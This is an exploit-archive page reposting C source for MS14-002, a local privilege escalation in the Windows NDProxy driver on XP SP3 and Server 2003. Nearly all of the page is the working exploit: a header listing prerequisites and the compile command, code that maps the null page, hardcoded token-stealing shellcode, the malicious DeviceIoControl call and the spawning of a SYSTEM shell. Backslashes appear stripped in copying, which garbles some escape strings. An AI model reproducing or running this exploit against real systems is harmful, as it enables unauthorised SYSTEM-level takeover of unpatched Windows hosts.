Home / os / winmobile

MS14-002 Windows NDProxy Privilege Escalation

Posted on 09 August 2015

/* ################################################################ # Exploit Title: Windows NDProxy Privilege Escalation (MS14-002) # Date: 2015-08-03 # Exploit Author: Tomislav Paskalev # Vulnerable Software: # Windows XP SP3 x86 # Windows XP SP2 x86-64 # Windows 2003 SP2 x86 # Windows 2003 SP2 x86-64 # Windows 2003 SP2 IA-64 # Supported vulnerable software: # Windows XP SP3 x86 # Windows 2003 SP2 x86 # Tested on: # Windows XP SP3 x86 EN # Windows 2003 SP2 x86 EN # CVE ID: 2013-5065 ################################################################ # Vulnerability description: # NDPROXY is a system-provided driver that interfaces WAN # miniport drivers, call managers, and miniport call managers # to the Telephony Application Programming Interfaces (TAPI) # services. # The vulnerability is caused when the NDProxy.sys kernel # component fails to properly validate input. # An attacker who successfully exploited this vulnerability # could run arbitrary code in kernel mode (i.e. with SYSTEM # privileges). ################################################################ # Exploit notes: # Privileged shell execution: # - the SYSTEM shell will spawn within the existing shell # (i.e. exploit usable via a remote shell) # Exploit compiling: # - # i586-mingw32msvc-gcc MS14-002.c -o MS14-002.exe # Exploit prerequisites: # - low privilege access to the target (remote shell or RDP) # - target not patched (KB2914368 not installed) # - service "Routing and Remote Access" running on the target # - "Power User" user group can start and stop services # - > sc query remoteaccess # - > sc start remoteaccess ################################################################ # Thanks to: # Andy (C PoC - Win XP SP3) # ryujin (Python PoC - Win XP SP3) ################################################################ # References: # http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5065 # https://technet.microsoft.com/en-us/library/security/ms14-002.aspx # https://penturalabs.wordpress.com/2013/12/11/ndproxy-privilege-escalation-cve-2013-5065/ # https://www.exploit-db.com/exploits/30014/ # https://msdn.microsoft.com/en-us/library/windows/desktop/ms681674%28v=vs.85%29.aspx # https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858%28v=vs.85%29.aspx # https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381%28v=vs.85%29.aspx # https://msdn.microsoft.com/en-us/library/windows/desktop/aa363216%28v=vs.85%29.aspx ################################################################ */ #include <windows.h> #include <stdio.h> #include <stdlib.h> typedef struct { PVOID Unknown1; PVOID Unknown2; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT NameLength; USHORT LoadCount; USHORT PathLength; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; typedef struct { ULONG Count; SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; typedef enum _SYSTEM_INFORMATION_CLASS { SystemModuleInformation = 11, SystemHandleInformation = 16 } SYSTEM_INFORMATION_CLASS; typedef DWORD NTSTATUS; NTSTATUS (WINAPI *_NtQuerySystemInformation) (SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); static VOID InitFirstPage (void) { PVOID BaseAddress; ULONG RegionSize; NTSTATUS ReturnCode; FARPROC NtAllocateVirtualMemory; NtAllocateVirtualMemory = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "NtAllocateVirtualMemory"); fprintf (stderr, "[+] NtAllocateVirtualMemory@%p ", NtAllocateVirtualMemory); RegionSize = 0xf000; BaseAddress = (PVOID) 0x00000001; ReturnCode = NtAllocateVirtualMemory (GetCurrentProcess (), &BaseAddress, 0, &RegionSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (ReturnCode != 0) { fprintf (stderr, "[-] NtAllocateVirtualMemory() failed to map first page "); fprintf (stderr, " Error code: %#X ", ReturnCode); fflush (stderr); ExitProcess (1); } fprintf (stderr, "[+] BaseAddress: %p, RegionSize: %#x ", BaseAddress, RegionSize), fflush (stderr); FillMemory (BaseAddress, RegionSize, 0x41); return; } int exploit (unsigned char *shellcode) { DWORD writtenBytes; int returnValue; InitFirstPage (); unsigned char *shellcodeBuffer; shellcodeBuffer = (char *) malloc (400); memset (shellcodeBuffer, (int) "xCC", 400); memcpy (shellcodeBuffer, shellcode, 112); returnValue = WriteProcessMemory ((HANDLE) 0xFFFFFFFF, (LPVOID) 0x00000001, shellcodeBuffer, 0x400, &writtenBytes); if (returnValue == 0) { printf ("[-] Attempt to map memory_write failed "); printf (" Error code: %d ", GetLastError ()); exit(1); } HANDLE ndProxyDeviceHandle = CreateFileA ("\\.\NDProxy", 0, 0, NULL, OPEN_EXISTING, 0, NULL); if (ndProxyDeviceHandle == INVALID_HANDLE_VALUE) { printf ("[-] Creating a device handle on NDProxy failed "); printf (" Error code: %d ", GetLastError()); exit (0); } DWORD inputBuffer [0x15] = {0}; DWORD returnedBytes = 0; *(inputBuffer + 5) = 0x7030125; *(inputBuffer + 7) = 0x34; DeviceIoControl (ndProxyDeviceHandle, 0x8fff23cc, inputBuffer, 0x54, inputBuffer, 0x24, &returnedBytes, 0); CloseHandle (ndProxyDeviceHandle); system ("cmd.exe /T:C0 /K cd c:\windows\system32"); return 0; } int main (int argc, char **argv) { if (argc != 2) { printf ("[*] Usage: %s OS_TYPE ", argv[0]); printf (" supported OS_TYPE: "); printf (" XP - Windows XP SP3 x86 "); printf (" 2k3 - Windows 2003 SP2 x86 "); printf ("[*] Note: the service "Routing and Remote Access" "); printf (" must be running on the target machine "); exit (0); } else { if ((strcmp (argv[1], "xp") == 0) || (strcmp (argv[1], "XP") == 0)) { unsigned char shellcodeXP[] = "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x3Cx00x00x00x90x90x90x90" "x90x33xC0x64x8Bx80x24x01x00x00x8Bx40x44x8BxC8x8B" "x80x88x00x00x00x2Dx88x00x00x00x83xB8x84x00x00x00" "x04x75xECx8Bx90xC8x00x00x00x89x91xC8x00x00x00xC3"; exploit (shellcodeXP); } else if ((strcmp (argv[1], "2k3") == 0) || (strcmp (argv[1], "2K3") == 0)) { unsigned char shellcode2k3[] = "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x3Cx00x00x00x90x90x90x90" "x90x33xC0x64x8Bx80x24x01x00x00x8Bx40x38x8BxC8x8B" "x80x98x00x00x00x2Dx98x00x00x00x83xB8x94x00x00x00" "x04x75xECx8Bx90xD8x00x00x00x89x91xD8x00x00x00xC3"; exploit (shellcode2k3); } else { printf ("[-] Invalid argument "); printf (" Argument used: %s ", argv[1]); exit(0); } } }

 

TOP